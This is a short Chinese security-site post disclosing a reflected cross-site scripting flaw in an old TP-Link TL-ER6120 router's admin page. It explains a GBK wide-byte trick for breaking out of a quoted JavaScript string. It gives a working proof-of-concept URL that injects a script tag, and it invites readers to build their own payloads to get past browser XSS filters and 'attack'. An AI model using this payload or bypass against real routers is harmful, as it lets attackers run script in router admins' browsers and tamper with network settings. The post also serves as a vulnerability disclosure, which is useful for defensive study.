频道栏目
首页 > 安全 > 网站安全 > 正文

TP-Link路由器 反射xss一枚

2013-09-12 10:05:23            作者:三年离歌
收藏   我要投稿

这个是针对老版的tp-link

当前软件版本:1.2.1 Build 20130604 Rel.31975
当前硬件版本:TL-ER6120 v1.0
我觉得要换路由器了 – - 这路由器太老了
对于那种需要401认证输入密码的 就不行
进个网站,路由器限制了

 

<script language=JavaScript> var OptValue = new Array( "www.baidu.com", "", 0, 0,0 ); </script>

由图片可以看出字符编码为GBK,你懂的,宽字节绕过
地址栏输入 %81%22 即可闭合双引号。接下来你懂的
测试浏览器 firefox

http://192.168.0.1/userRpm/AdCastWebsiteNotice.htm?orgUrl=%81%22%29;%3C/script%3E%3Cscript%3Ealert%28%27Leesec%27%29;%3C/script%3E

IE 和 GOOGLE浏览器有XSS Filter,大家可以自己构造XSS代码,绕过XSS Filter,进行攻击

相关TAG标签 路由器
上一篇:有效防范PHP木马的方法
下一篇:zcncms网站管理系统 v1.2.14 最新未授权访问/敏感信息泄露
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站